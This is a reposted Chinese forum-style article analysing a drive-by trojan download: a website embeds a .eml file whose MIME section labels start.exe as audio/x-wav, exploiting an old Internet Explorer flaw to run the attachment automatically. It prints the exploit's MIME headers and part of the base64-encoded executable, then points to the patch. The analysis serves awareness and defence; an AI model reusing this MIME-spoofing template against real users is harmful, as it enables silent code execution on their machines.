| 一种危险的木马植入方法 |
|
| |
|
FONT id=font_word style="FONT-SIZE: 14px; FONT-FAMILY: 宋体, Verdana, Arial, Helvetica, sans-serif">今天在www.xfocus.net安全论坛上看见有帖子说www.maylu.com登录这个网站后会自动下
载一个start.exe的程序并自动运行。于是上到这个网站上看了一下,
打开IE浏览器:在地址栏中输入 _blank href=http://www.maylu.com/index.asp>http://www.maylu.com/index.asp
在网页打开的过程中鼠标奇怪的变成沙漏的状态,看来的确是有程序在运行。打开计算机的
任务管理器,可以看到多了一个start.exe的进程。进程对应的文件是\winnt\system32\sta
rt.exe(在我的win2000上是这样)并且start.exe已经将自己登记在注册表开机启动项中。这
样每次开机都会运行start.exe。
start.exe运行后占有系统资源,不断的向外发送数据,用sniffer看了一下,还好,发送
的都是HTTP请求,仔细检查系统也没发现什么其他损害的地方。看来木马并不是恶意的。
让我感兴趣的是木马是如何下载到浏览主页的用户的计算机上并运行起来的。于是和tea
water一块研究了一下。定制了一下IE的安全级别,将ActiveX支持等都全部关掉,再浏览网
页,还是下载并运行了。看来和ActiveX无关。把IE的安全级别中文件下载禁止了,再上去,
这回不让再下载了。
看来还是看看这程序是如何下载到自己计算机上的,打开问题网页的源代码看了看,网页
代码最后面有这么一句话。
网页中干吗要有.eml文件,这不是邮件的格式吗。在IE浏览器中输入
_blank>http://www.maylu.com/t.eml
再看看任务管理器,start.exe进程有回来了,原来问题就在这个文件上。既然问题在这文件
上,当然想办法搞到这个文件看看了。用蚂蚁把文件下载下来
鼠标刚点上去,start.exe又被执行了。
用uedit7打开内容看看,内容入下
From: "xxx"
To: "xxx"
Subject: xxxx
Date: Tue, 7 Apr 2001 15:16:57 +800
MIME-Version: 1.0
***tent-Type: multipart/related;
type="multipart/alternative";
boundary="1"
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
--1
***tent-Type: multipart/alternative;
boundary="2"
--2
***tent-Type: text/html;
charset="gb2312"
***tent-Transfer-Encoding: quoted-printable
--2--
--1
***tent-Type: audio/x-wav;
name="start.exe"
***tent-Transfer-Encoding: base64
***tent-ID:
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
gAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0K
JAAAAAAAAABQRQAATAEDAIh3BDsAAAAAAAAAAOAADwELAQQUACAAAAAQAAAAkAAAIL0AAACgAAAAwAAA
AABAAAAQAAAAAgAABAAAAAEAAAAEAAAAAAAAAADQAAAAEAAAAAAAAAIAAAAAABAAABAAAAAAEAAAEAAA
AAAAABAAAAAAAAAAAAAAAHDGAACcAAAAAMAAAHAGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA......(删掉一大节)
--1
后面的不管它,那就是start.exe经过base64编码的内容。
关键是前面这一段
***tent-Type: audio/x-wav;
name="start.exe"
把start.exe的的类型定义为audio/x-wav,这下清楚了,这是利用客户端支持的 MIME(多部
分网际邮件扩展,Multipart Internet Mail Extension) 类型的漏洞来完成的。当申明邮件
的类型为audio/x-wav时,IE存在的一个漏洞会将附件认为是音频文件自动尝试打开,,结果
导致邮件文件t.eml中的附件start.exe被执行。在win2000上,即使是用鼠标点击下载下来的
t.eml,或是拷贝粘贴,都会导致t.eml中的附件被运行,微软的这个漏洞可害人不浅啊。
还好这个start.exe没有什么恶意,只是想利用用户帮自己赚点广告费而已。虽然这做法有
点卑鄙,不过还是可以原谅。话又说回来,要是这里面运行的是一个木马或者是一个恶意程
序的话有如何......。
赶快打补丁吧
_blank>http://www.microsoft.com/windows/ie/download/critical/Q290108/default.asp
 |
频道声明:本频道的文章除部分特别声明禁止转载的专稿外,可以自由转载.但请务必注明出出处和原始作者 文章版权归本频道与文章作者所有.对于被频道转载文章的个人和网站,我们表示深深的谢意。
| 原始作者:佚名 |
录入时间:2007-1-3 2:05:51 |
| 信息来源:不详 |
投稿信箱:itqoo@126.com |
|
|
 |
|
|
|
| 文章录入:itqoo 责任编辑:itqoo |
|
上一个文章: 黑客常用的入侵方法
下一个文章: DDoS攻击教程(3) |
| 【字体:小 大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 |
用户登录 
新用户注册 
网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!) 